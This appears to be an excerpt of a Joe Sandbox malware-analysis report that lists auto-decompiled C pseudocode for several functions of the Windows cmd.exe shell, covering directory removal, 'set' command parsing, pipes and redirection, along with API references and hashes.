				asm("stosd");
				_v668 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v588 = 0;
				_v584 = 0;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = 0;
				_v564 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t128 = _t127 + 0xc;
				if(E00D90C70( &_v548, 0x7fe9) < 0) {
					L18:
					_t122 = 1;
				} else {
					_t112 =  &_v660;
					_v664 =  *0xdc3cd8;
					_v656 = 6;
					_t122 = 0;
					_v652 = 0;
					_v588 = 0;
					_v568 = 0;
					if(E00D88AD7( &_v660) == 1) {
						goto L18;
					} else {
						_t103 = _v24;
						if(_v24 == 0) {
							_t103 = _t128 + 0x88;
						}
						_t112 =  *((intOrPtr*)(_t128 + 0x298));
						E00D936CB(_t93, _t103,  *((intOrPtr*)(_t128 + 0x298)), 0);
						_t95 = _v588;
						if(_t95 == 0) {
							_push(0);
							goto L30;
						} else {
							_t112 =  &_v580;
							_t118 = _t95;
							do {
								_t106 =  *_t112;
								_v668 = _t106 + 2;
								do {
									_t79 =  *_t106;
									_t106 = _t106 + 2;
								} while (_t79 != _v664);
								_t107 = _t106 - _v668;
								_t103 = _t107 >> 1;
								if(_t107 == 0) {
									_push(0);
									L30:
									_push(0x232a);
									E00D8C5A2(_t103);
									goto L18;
								} else {
									goto L8;
								}
								goto L16;
								L8:
								_t112 =  *((intOrPtr*)(_t112 + 0xc));
								_t118 = _t118 - 1;
							} while (_t118 != 0);
							_t119 =  &_v580;
							_t82 = _v656 & 0x00000010;
							_v664 = _t82;
							do {
								if(_t82 == 0) {
									if(RemoveDirectoryW( *_t119) != 0) {
										goto L13;
									} else {
										_t87 = GetLastError();
										_t122 = _t87;
										_push(0);
										_push(_t87);
										goto L28;
									}
									goto L16;
								} else {
									if((_v656 & 0x00002000) == 0) {
										_t112 = 0x234e;
										if(E00DA9583( *_t119, 0x234e, 0x2328) == 1) {
											goto L12;
										} else {
											_t122 = 1;
											goto L13;
										}
										goto L16;
									} else {
										L12:
										_t109 =  *_t119;
										_t112 =  &_v668;
										_t91 = E00D885EA( *_t119,  &_v668);
										if(_t91 != 0) {
											if(_t91 != 0x91 || _v668 != 0) {
												_t109 = 0;
												_t122 = _t91;
												_push(0);
												_push(_t91);
												L28:
												E00D8C5A2(_t109);
												_pop(_t109);
											}
										}
									}
								}
								L13:
								_t119 = _t119[3];
								_t82 = _v664;
								_t95 = _t95 - 1;
							} while (_t95 != 0);
							_t84 = _v24;
							if(_v24 == 0) {
								_t84 = _t128 + 0x88;
							}
							E00D90BFC(_t84,  *((intOrPtr*)(_t128 + 0x298)));
							E00D92A06(_v668, _t119);
						}
					}
				}
				L16:
				__imp__??_V@YAXPAX@Z(_v28);
				_pop(_t116);
				_pop(_t123);
				_pop(_t94);
				return E00D96FD0(_t122, _t94, _v8 ^ _t128, _t112, _t116, _t123);
			}

0x00d888e0
0x00d888e6
0x00d888ed
0x00d888f6
0x00d888ff
0x00d88903
0x00d88907
0x00d8890e
0x00d88916
0x00d8891a
0x00d8891e
0x00d88922
0x00d88926
0x00d8892a
0x00d8892e
0x00d88932
0x00d88936
0x00d8893a
0x00d8893e
0x00d88942
0x00d88946
0x00d88947
0x00d8894b
0x00d88952
0x00d88953
0x00d88954
0x00d88958
0x00d88960
0x00d88964
0x00d88968
0x00d8896c
0x00d88970
0x00d88974
0x00d88978
0x00d88979
0x00d8897a
0x00d88981
0x00d88991
0x00d88996
0x00d889ac
0x00d88ad2
0x00d88ad4
0x00d889b2
0x00d889b7
0x00d889bd
0x00d889c3
0x00d889cb
0x00d889cd
0x00d889d1
0x00d889d5
0x00d889e1
0x00000000
0x00d889e7
0x00d889e7
0x00d889f0
0x00da06ab
0x00da06ab
0x00d889f6
0x00d889fe
0x00d88a03
0x00d88a09
0x00da06b7
0x00000000
0x00d88a0f
0x00d88a0f
0x00d88a13
0x00d88a15
0x00d88a15
0x00d88a1a
0x00d88a1e
0x00d88a1e
0x00d88a21
0x00d88a24
0x00d88a2b
0x00d88a2f
0x00d88a31
0x00da0720
0x00da0721
0x00da0721
0x00da0726
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d88a37
0x00d88a37
0x00d88a3a
0x00d88a3a
0x00d88a43
0x00d88a47
0x00d88a4a
0x00d88a4e
0x00d88a50
0x00da0700
0x00000000
0x00da0706
0x00da0706
0x00da070c
0x00da0710
0x00da0711
0x00000000
0x00da0711
0x00000000
0x00d88a56
0x00d88a5e
0x00da06bc
0x00da06ce
0x00000000
0x00da06d4
0x00da06d6
0x00000000
0x00da06d6
0x00000000
0x00d88a64
0x00d88a64
0x00d88a64
0x00d88a66
0x00d88a6a
0x00d88a71
0x00da06e1
0x00da06ee
0x00da06f0
0x00da06f2
0x00da06f3
0x00da0712
0x00da0712
0x00da0718
0x00da0718
0x00da06e1
0x00d88a71
0x00d88a5e
0x00d88a77
0x00d88a77
0x00d88a7a
0x00d88a7e
0x00d88a7e
0x00d88a83
0x00d88a8c
0x00d88ac9
0x00d88ac9
0x00d88a96
0x00d88a9f
0x00d88a9f
0x00d88a09
0x00d889e1
0x00d88aa4
0x00d88aab
0x00d88abb
0x00d88abc
0x00d88abd
0x00d88ac8

APIs

memset.MSVCRT ref: 00D88991

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

??_V@YAXPAX@Z.MSVCRT ref: 00D88AAB

Part of subcall function 00D936CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,00D8590A,00000000), ref: 00D936F0

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$CurrentDirectory
String ID:
API String ID: 168429351-0
Opcode ID: 29ca61606827e97f12659281ad32e0bfa8386920f12bd5e3d7ec3ebba610564f
Instruction ID: 3e80daaad60201d1974693e54a056df39eedebcc4042d8a34bf664838a9966b3
Opcode Fuzzy Hash: 29ca61606827e97f12659281ad32e0bfa8386920f12bd5e3d7ec3ebba610564f
Instruction Fuzzy Hash: F5615571A083019FD728EF29D48566BBBE5FB89304F58492EF589C32A0DB30D904DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00D85F75, Relevance: 6.2, APIs: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00D85F75(void* __ecx) {
				short* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t22;
				intOrPtr _t24;
				short* _t28;
				void* _t29;
				void* _t30;
				long _t32;
				signed int _t34;
				void* _t35;
				signed int _t38;
				signed int _t39;
				wchar_t* _t40;
				long _t41;
				wchar_t* _t42;
				signed int _t44;
				signed int _t45;
				void* _t46;
				void* _t47;
				wchar_t* _t51;
				wchar_t* _t60;
				signed int _t61;
				signed int _t70;
				void* _t71;
				wchar_t* _t73;
				void* _t75;
				long* _t78;
				long* _t80;
				long _t81;
				void* _t82;
				signed short* _t84;
				wchar_t* _t85;

				_t84 =  *(__ecx + 0x3c);
				if( *0xdc3cc9 == 0) {
					_t85 = E00D8EA40(_t84, "=", 3);
					_t83 = 0;
					__eflags =  *_t85;
					if( *_t85 == 0) {
						L26:
						return E00DA4506( *0xdb3834);
					}
					_t73 = _t85;
					_v8 = 0;
					_t46 = 2;
					do {
						_t51 = _t73;
						_t6 =  &(_t51[0]); // 0x2
						_v12 = _t6;
						do {
							_t22 =  *_t51;
							_t51 = _t51 + _t46;
							__eflags = _t22 - _t83;
						} while (_t22 != _t83);
						_t53 = _t51 - _v12 >> 1;
						_t73 = _t73 + (_t51 - _v12 >> 1) * 2 + 2;
						_t24 = _v8 + 1;
						_v8 = _t24;
						__eflags =  *_t73 - _t83;
					} while ( *_t73 != _t83);
					__eflags = _t24 - 3;
					if(_t24 > 3) {
						L40:
						_push(_t83);
						_push(0x232a);
						E00D8C5A2(_t53);
						return 1;
					}
					_t53 = _t85;
					_t28 = E00D8D7E6(_t53);
					_v8 = _t28;
					__eflags =  *_t28 - 0x3d;
					if( *_t28 != 0x3d) {
						goto L40;
					}
					_t75 = _t53 + 2;
					do {
						_t29 =  *_t53;
						_t53 = _t53 + _t46;
						__eflags = _t29 - _t83;
					} while (_t29 != _t83);
					_v12 = _t53 - _t75 >> 1;
					_t30 = E00D922C0(_t46, _t85);
					__eflags = _v12 + 1;
					E00D91040(_t85, _v12 + 1, _t30);
					_t60 = _t85;
					_t17 =  &(_t60[0]); // 0x2
					_t78 = _t17;
					do {
						_t32 =  *_t60;
						_t60 = _t60 + _t46;
						__eflags = _t32 - _t83;
					} while (_t32 != _t83);
					_t61 = _t60 - _t78;
					__eflags = _t61;
					_t53 = _t61 >> 1;
					if(_t61 == 0) {
						goto L40;
					}
					_t80 = _v8 + 4;
					L14:
					return E00D93A50(_t85, _t80);
				}
				if(_t84 == 0) {
					goto L26;
				}
				_t34 =  *_t84 & 0x0000ffff;
				if(_t34 == 0) {
					goto L26;
				}
				_t53 = _t34;
				_t35 = 0x20;
				_t47 = 2;
				while(_t53 <= _t35) {
					_t84 = _t84 + _t47;
					_t45 =  *_t84 & 0x0000ffff;
					_t53 = _t45;
					_t35 = 0x20;
					if(_t45 != 0) {
						continue;
					}
					break;
				}
				_t83 = 0;
				if( *_t84 == 0) {
					goto L26;
				}
				__imp___wcsnicmp(_t84, L"/A", _t47);
				if(_t35 == 0) {
					return E00D86052( &(_t84[2]));
				}
				__imp___wcsnicmp(_t84, L"/P", _t47);
				if(_t35 == 0) {
					return E00DA474C(_t47,  &(_t84[2]), _t71, 0, _t84, __eflags);
				}
				_t38 =  *_t84 & 0x0000ffff;
				if(_t38 == 0x2f) {
					goto L40;
				}
				_t81 = 0x22;
				if(_t38 == _t81) {
					_t85 = _t84 + _t47;
					_t39 =  *_t85 & 0x0000ffff;
					__eflags = _t39;
					if(_t39 == 0) {
						L24:
						_t40 = wcsrchr(_t85, _t81);
						_pop(_t53);
						__eflags = _t40;
						if(_t40 != 0) {
							_t53 = 0;
							 *_t40 = 0;
						}
						goto L11;
					}
					_t70 = _t39;
					_t82 = 0x20;
					while(1) {
						__eflags = _t70 - _t82;
						if(_t70 > _t82) {
							break;
						}
						_t85 = _t85 + _t47;
						_t44 =  *_t85 & 0x0000ffff;
						_t70 = _t44;
						__eflags = _t44;
						if(_t44 != 0) {
							continue;
						}
						break;
					}
					_t81 = 0x22;
					goto L24;
				}
				L11:
				_t41 = 0x3d;
				if( *_t85 == _t41) {
					goto L40;
				}
				_t42 = wcschr(_t85, _t41);
				if(_t42 == 0) {
					return E00DA4588(_t85);
				}
				_t2 =  &(_t42[0]); // 0x2
				_t80 = _t2;
				 *_t42 = 0;
				goto L14;
			}

0x00d85f86
0x00d85f8a
0x00d9a9e9
0x00d9a9eb
0x00d9a9ed
0x00d9a9f0
0x00d9a9cb
0x00000000
0x00d9a9d1
0x00d9a9f4
0x00d9a9f6
0x00d9a9f9
0x00d9a9fa
0x00d9a9fa
0x00d9a9fc
0x00d9a9ff
0x00d9aa02
0x00d9aa02
0x00d9aa05
0x00d9aa07
0x00d9aa07
0x00d9aa12
0x00d9aa17
0x00d9aa1a
0x00d9aa1b
0x00d9aa1e
0x00d9aa1e
0x00d9aa23
0x00d9aa26
0x00d9aa7f
0x00d9aa7f
0x00d9aa80
0x00d9aa85
0x00000000
0x00d9aa8e
0x00d9aa28
0x00d9aa2a
0x00d9aa2f
0x00d9aa32
0x00d9aa36
0x00000000
0x00000000
0x00d9aa38
0x00d9aa3b
0x00d9aa3b
0x00d9aa3e
0x00d9aa40
0x00d9aa40
0x00d9aa49
0x00d9aa4e
0x00d9aa59
0x00d9aa5a
0x00d9aa5f
0x00d9aa61
0x00d9aa61
0x00d9aa64
0x00d9aa64
0x00d9aa67
0x00d9aa69
0x00d9aa69
0x00d9aa6e
0x00d9aa6e
0x00d9aa70
0x00d9aa72
0x00000000
0x00000000
0x00d9aa77
0x00d86031
0x00000000
0x00d86033
0x00d85f92
0x00000000
0x00000000
0x00d85f98
0x00d85f9e
0x00000000
0x00000000
0x00d85fa6
0x00d85fa8
0x00d85fab
0x00d85fac
0x00d85fb1
0x00d85fb5
0x00d85fb8
0x00d85fbd
0x00d85fbe
0x00000000
0x00000000
0x00000000
0x00d85fbe
0x00d85fc0
0x00d85fc5
0x00000000
0x00000000
0x00d85fd2
0x00d85fdd
0x00000000
0x00d86042
0x00d85fe6
0x00d85ff1
0x00000000
0x00d9a982
0x00d85ff7
0x00d85ffd
0x00000000
0x00000000
0x00d86005
0x00d86009
0x00d9a98c
0x00d9a98e
0x00d9a991
0x00d9a994
0x00d9a9af
0x00d9a9b1
0x00d9a9b8
0x00d9a9b9
0x00d9a9bb
0x00d9a9c1
0x00d9a9c3
0x00d9a9c3
0x00000000
0x00d9a9bb
0x00d9a998
0x00d9a99a
0x00d9a99b
0x00d9a99b
0x00d9a99e
0x00000000
0x00000000
0x00d9a9a0
0x00d9a9a2
0x00d9a9a5
0x00d9a9a7
0x00d9a9aa
0x00000000
0x00000000
0x00000000
0x00d9a9aa
0x00d9a9ae
0x00000000
0x00d9a9ae
0x00d8600f
0x00d86011
0x00d86015
0x00000000
0x00000000
0x00d8601d
0x00d86027
0x00000000
0x00d8604b
0x00d8602b
0x00d8602b
0x00d8602e
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 00D85FD2
_wcsnicmp.MSVCRT ref: 00D85FE6
wcschr.MSVCRT ref: 00D8601D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 43b47d02b95c1032ec687072b988b47161a75344642a0ee523a70278cdf4900c
Instruction ID: 3e448f609a577107481ce5b07111d98edb370b61ce272426bbcd7ec652a9487d
Opcode Fuzzy Hash: 43b47d02b95c1032ec687072b988b47161a75344642a0ee523a70278cdf4900c
Instruction Fuzzy Hash: AB519E366002119BDF24FB2C9925A7E7364EF80B50B5D446DE8839B2C1EB718E42C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00D8AF70, Relevance: 6.2, APIs: 4, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00D8AF70(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _t39;
				void** _t40;
				void* _t42;
				signed int _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t54;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t68;
				long _t75;
				void* _t78;
				signed int _t83;
				void* _t87;
				signed int _t102;
				long _t114;
				void* _t116;
				void* _t117;
				void** _t119;

				_push(__ecx);
				_t39 = _a4;
				_t114 =  *((intOrPtr*)(_t39 + 0x38));
				_t75 =  *((intOrPtr*)(_t39 + 0x3c));
				_t78 = 0x28;
				_t40 = E00D900B0(_t78);
				_t119 = _t40;
				if(_t119 == 0) {
					L27:
					_t42 = 1;
				} else {
					__imp___pipe(_t119, 0, 0x8000);
					if(_t40 != 0) {
						_push(0);
						_push(8);
						E00D8C5A2(_t78);
						goto L27;
					} else {
						E00D8B15E( *_t119);
						E00D8B15E(_t119[1]);
						_t46 =  *0xdad550; // 0x0
						_t83 = _t46;
						 *0xdad550 = _t46 + 1;
						if(_t83 != 0) {
							_t48 =  *0xdad5c0; // 0x0
							 *(_t48 + 0x24) = _t119;
							_t119[9] = _t119[9] & 0x00000000;
							_t119[8] = _t48;
						} else {
							_t119[8] = _t119[8] & _t83;
							 *0xdad5c4 = _t119;
						}
						_t85 = 1;
						 *0xdad5c0 = _t119;
						_t50 = E00D8DBCE(_t119, 1);
						_t119[3] = _t50;
						if(_t50 == 0xffffffff) {
							_t119[3] = _t119[3] | 0xffffffff;
							L23:
							_push(0);
							L31:
							E00D8C5A2(_t85);
							_t87 = 0x2351;
							L32:
							E00DA9287(_t87);
							__imp__longjmp(0xdbb8b8, 1);
							asm("int3");
							_t102 = (_t87 - 0x20 >> 5) + 1;
							_t54 =  *((intOrPtr*)(0xdad5d0 + _t102 * 4));
							asm("bts eax, ecx");
							 *((intOrPtr*)(0xdad5d0 + _t102 * 4)) = _t54;
							return _t54;
						}
						_t85 = _t119[1];
						if(E00D8DBFC(_t119[1], 1) == 0xffffffff) {
							goto L23;
						}
						E00D8DB92(_t119[1]);
						_t119[1] = _t119[1] & 0x00000000;
						if( *_t114 <= 0) {
							E00D8E040(_t114,  &_v8);
						}
						_t116 = E00D90E00(1, _t114);
						if( *0xdad54c != 0) {
							__imp___get_osfhandle(1);
							DuplicateHandle( *0xdad54c, 0,  *_t119, 0, 0, 0, 0);
						}
						_t85 = _t119[3];
						if(E00D8DBFC(_t119[3], 1) == 0xffffffff) {
							goto L23;
						}
						_t87 = _t119[3];
						E00D8DB92(_t87);
						_t119[3] = _t119[3] & 0x00000000;
						if(_t116 != 0) {
							goto L32;
						}
						_t60 =  *0xdad54c; // 0x0
						_t85 = 0;
						_t119[4] = _t60;
						_t119[6] =  *0xdb3838;
						 *0xdad54c = _t116;
						 *0xdb3838 = _t116;
						_t62 = E00D8DBCE( *0xdb3838, 0);
						_t119[2] = _t62;
						if(_t62 == 0xffffffff) {
							_t119[2] = _t119[2] | 0xffffffff;
							L30:
							_push(_t116);
							goto L31;
						}
						_t85 =  *_t119;
						if(E00D8DBFC( *_t119, 0) == 0xffffffff) {
							goto L30;
						}
						E00D8DB92( *_t119);
						 *_t119 = _t116;
						if( *_t75 <= _t116) {
							E00D8E040(_t75,  &_v8);
						}
						_t65 = E00D90E00(1, _t75);
						_t85 = _t119[2];
						_t117 = _t65;
						if(E00D8DBFC(_t119[2], 0) == 0xffffffff) {
							goto L23;
						}
						E00D8DB92(_t119[2]);
						_t87 = 0;
						_t119[2] = 0;
						if(_t117 != 0) {
							goto L32;
						}
						 *0xdad550 =  *0xdad550 - 1;
						_t68 =  *0xdad54c; // 0x0
						_t119[5] = _t68;
						_t119[7] =  *0xdb3838;
						 *0xdad54c = 0;
						 *0xdb3838 = 0;
						if( *0xdad550 != 0) {
							_t42 = 0;
						} else {
							_t42 = E00D8B183();
						}
					}
				}
				return _t42;
			}

0x00d8af78
0x00d8af79
0x00d8af7f
0x00d8af82
0x00d8af87
0x00d8af88
0x00d8af8d
0x00d8af91
0x00da12c3
0x00da12c5
0x00d8af97
0x00d8af9f
0x00d8afaa
0x00da12b8
0x00da12ba
0x00da12bc
0x00000000
0x00d8afb0
0x00d8afb2
0x00d8afba
0x00d8afbf
0x00d8afc4
0x00d8afc7
0x00d8afce
0x00d8b13f
0x00d8b144
0x00d8b147
0x00d8b14b
0x00d8afd4
0x00d8afd4
0x00d8afd7
0x00d8afd7
0x00d8afe1
0x00d8afe2
0x00d8afe7
0x00d8afec
0x00d8aff2
0x00da12cb
0x00d8b157
0x00d8b157
0x00da12d9
0x00da12de
0x00da12e4
0x00da12e5
0x00da12e5
0x00da12f1
0x00da12f7
0x00da12fe
0x00d8b171
0x00d8b178
0x00d8b17b
0x00000000
0x00d8b17b
0x00d8aff8
0x00d8b006
0x00000000
0x00000000
0x00d8b00f
0x00d8b014
0x00d8b01b
0x00d8b023
0x00d8b023
0x00d8b039
0x00d8b03b
0x00d8b047
0x00d8b055
0x00d8b055
0x00d8b05b
0x00d8b069
0x00000000
0x00000000
0x00d8b06f
0x00d8b072
0x00d8b077
0x00d8b07d
0x00000000
0x00000000
0x00d8b083
0x00d8b088
0x00d8b08a
0x00d8b092
0x00d8b095
0x00d8b09b
0x00d8b0a1
0x00d8b0a6
0x00d8b0ac
0x00da12d4
0x00da12d8
0x00da12d8
0x00000000
0x00da12d8
0x00d8b0b2
0x00d8b0be
0x00000000
0x00000000
0x00d8b0c6
0x00d8b0cb
0x00d8b0cf
0x00d8b0d7
0x00d8b0d7
0x00d8b0e1
0x00d8b0e6
0x00d8b0eb
0x00d8b0f5
0x00000000
0x00000000
0x00d8b0fa
0x00d8b0ff
0x00d8b101
0x00d8b106
0x00000000
0x00000000
0x00d8b10c
0x00d8b113
0x00d8b118
0x00d8b120
0x00d8b123
0x00d8b129
0x00d8b12f
0x00d8b153
0x00d8b131
0x00d8b131
0x00d8b131
0x00d8b12f
0x00d8afaa
0x00d8b13c

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

_pipe.MSVCRT ref: 00D8AF9F

Part of subcall function 00D8DBCE: _dup.MSVCRT ref: 00D8DBD5

longjmp.MSVCRT(00DBB8B8,00000001), ref: 00DA12F1

Part of subcall function 00D8DBFC: _dup2.MSVCRT ref: 00D8DC10

Part of subcall function 00D8DB92: _close.MSVCRT ref: 00D8DBC1

_get_osfhandle.MSVCRT ref: 00D8B047
DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D8B055

Part of subcall function 00D8E040: memset.MSVCRT ref: 00D8E090
Part of subcall function 00D8E040: wcschr.MSVCRT ref: 00D8E0F3
Part of subcall function 00D8E040: wcschr.MSVCRT ref: 00D8E10B
Part of subcall function 00D8E040: _wcsicmp.MSVCRT ref: 00D8E179

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
String ID:
API String ID: 1441200171-0
Opcode ID: 599a1d01b1fbd8ea05fad23db0b08042728a16e65361af540e502f37388e5735
Instruction ID: eab86f9208f951a2bf3aa15c8d1d84a26ceffc5947de07b31395305293abf936
Opcode Fuzzy Hash: 599a1d01b1fbd8ea05fad23db0b08042728a16e65361af540e502f37388e5735
Instruction Fuzzy Hash: FB5183755007019FD724AF29D856A26B7E2EB86334F148A1EF46BC67D1EB30E801CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D902B0, Relevance: 6.2, APIs: 4, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00D902B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v16;
				signed short* _v20;
				signed short _v24;
				signed short _t29;
				signed int _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr* _t36;
				intOrPtr _t39;
				int _t47;
				intOrPtr _t48;
				intOrPtr* _t59;
				intOrPtr* _t63;
				signed short _t69;
				signed short* _t70;
				intOrPtr* _t71;
				signed short _t76;
				intOrPtr* _t77;
				signed short _t83;
				void* _t91;
				void* _t95;

				_v8 =  *((intOrPtr*)(_t91 + 4));
				_t95 = (_t91 - 0x00000008 & 0xfffffff8) + 4 - 0x10;
				_t83 = 0;
				_v16 = __ecx;
				_v24 = 0;
				while(1) {
					_t69 =  *0xdbfaa0;
					_t29 = _t69 & 0x0000ffff;
					_t76 = _t29;
					_v20 = _t29;
					_t30 = _t76 & 0x0000ffff;
					if(_t30 == 0x3e || _t30 == 0x3c) {
						goto L7;
					}
					_t41 = iswdigit(_t69 & 0x0000ffff);
					_t95 = _t95 + 4;
					if(_t41 != 0) {
						_t76 =  *0xdbfaa2;
						_t41 = _t76 & 0x0000ffff;
						if(_t41 != 0x3e) {
							if(_t41 == 0x3c) {
								goto L7;
							} else {
								goto L4;
							}
						} else {
							goto L7;
						}
					} else {
						L4:
						if(_t83 != 0) {
							if(_v24 == _t83) {
								E00D8F300(_t41, 0, 0, 0);
							}
							return 1;
						} else {
							return 0;
						}
					}
					L40:
					L7:
					_t31 = E00D900B0(0x18);
					_t59 = _v16;
					 *_t59 = _t31;
					if(_t31 == 0) {
						 *0xdbf980 = 0x234a;
						__imp__longjmp(0xdbb940, 1);
						asm("int3");
						if(_t59 <= 0xc42e || _t59 == 0xc431 || _t59 == 0xc433) {
							_t69 = 0;
						}
						return _t69;
					} else {
						 *(_t31 + 0x10) = _t76;
						_t83 = _t83 + 1;
						_v20 = 0xdbfaa0;
						_t34 = iswdigit( *0xdbfaa0 & 0x0000ffff);
						_t95 = _t95 + 4;
						_t36 =  *_v16;
						if(_t34 != 0) {
							 *_t36 = ( *0xdbfaa0 & 0x0000ffff) - 0x30;
							_t63 = 0xdbfaa2;
						} else {
							_t63 = _v20;
							if(_t76 != 0x3e) {
								 *_t36 = 0;
							} else {
								 *_t36 = 1;
							}
						}
						_t11 = _t63 + 2; // 0xdbfaa4
						_t70 = _t11;
						_v20 = _t70;
						if( *_t63 !=  *_t70) {
							_t77 = _v16;
						} else {
							if(_t76 == 0x3c) {
								E00DA82EB(_t63);
								_t70 = _v20;
							}
							_t77 = _v16;
							_t63 = _t70;
							 *((intOrPtr*)( *_t77 + 0xc)) = 1;
						}
						_t64 = _t63 + 2;
						_v20 = _t64;
						if( *_t64 == 0x26) {
							_t71 = _t64;
							_t22 = _t71 + 2; // 0xdbfaa2
							_v16 = _t22;
							do {
								_t39 =  *_t71;
								_t71 = _t71 + 2;
							} while (_t39 != 0);
							if(_t71 - _v16 >> 1 != 2) {
								L28:
								E00DA82EB(_t64);
							} else {
								_t47 = iswdigit( *(_t64 + 2) & 0x0000ffff);
								_t95 = _t95 + 4;
								if(_t47 == 0) {
									goto L28;
								} else {
									_t48 = E00D8DF40(_v20);
									_t64 =  *_t77;
									 *((intOrPtr*)( *_t77 + 4)) = _t48;
									if(_t48 == 0) {
										goto L28;
									}
								}
							}
						} else {
							 *((intOrPtr*)( *_t77 + 4)) = E00D8DDCD(_t64);
						}
						if(E00D8EEC8() == 0) {
							goto L4;
						} else {
							E00D8F030(0);
							_v24 = _v24 + 1;
							_v16 =  *_t77 + 0x14;
							continue;
						}
					}
					goto L40;
				}
			}

0x00d902c2
0x00d902c8
0x00d902cc
0x00d902ce
0x00d902d2
0x00d902e0
0x00d902e0
0x00d902e7
0x00d902ea
0x00d902ed
0x00d902f0
0x00d902f6
0x00000000
0x00000000
0x00d90301
0x00d90307
0x00d9030c
0x00d90321
0x00d90328
0x00d9032e
0x00d9cad6
0x00000000
0x00d9cadc
0x00000000
0x00d9cadc
0x00000000
0x00000000
0x00000000
0x00d9030e
0x00d9030e
0x00d90310
0x00d903ec
0x00d903f4
0x00d903f4
0x00d90406
0x00d90316
0x00d90320
0x00d90320
0x00d90310
0x00000000
0x00d90334
0x00d90339
0x00d9033e
0x00d90341
0x00d90345
0x00d9cb00
0x00d9cb0a
0x00d9cb10
0x00d9cb17
0x00d9065e
0x00d9065e
0x00d9065d
0x00d9034b
0x00d9034b
0x00d9035b
0x00d9035d
0x00d90360
0x00d90366
0x00d9036e
0x00d90370
0x00d90416
0x00d90418
0x00d90376
0x00d90376
0x00d9037d
0x00d9cae1
0x00d90383
0x00d90383
0x00d90383
0x00d9037d
0x00d9038c
0x00d9038c
0x00d9038f
0x00d90395
0x00d90407
0x00d90397
0x00d9039b
0x00d9caec
0x00d9caf1
0x00d9caf1
0x00d903a1
0x00d903a4
0x00d903a8
0x00d903a8
0x00d903af
0x00d903b2
0x00d903b9
0x00d90422
0x00d90424
0x00d90427
0x00d90430
0x00d90430
0x00d90433
0x00d90436
0x00d90443
0x00d9046c
0x00d9046c
0x00d90445
0x00d9044a
0x00d90450
0x00d90455
0x00000000
0x00d90457
0x00d9045a
0x00d9045f
0x00d90461
0x00d90466
0x00000000
0x00000000
0x00d90466
0x00d90455
0x00d903bb
0x00d903c2
0x00d903c2
0x00d903cc
0x00000000
0x00d903d2
0x00d903d4
0x00d903de
0x00d903e1
0x00000000
0x00d903e1
0x00d903cc
0x00000000
0x00d90345

APIs

iswdigit.MSVCRT ref: 00D90301
iswdigit.MSVCRT ref: 00D90360
iswdigit.MSVCRT ref: 00D9044A

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: iswdigit
String ID:
API String ID: 3849470556-0
Opcode ID: e75517bd3ef456bb30e3c632652ff9bf05fdf88052db71b2b684558f006c84ab
Instruction ID: e1bf8cc072f49bf5f290165184cac0e207d88f2793ed7c2e103c9d962c200807
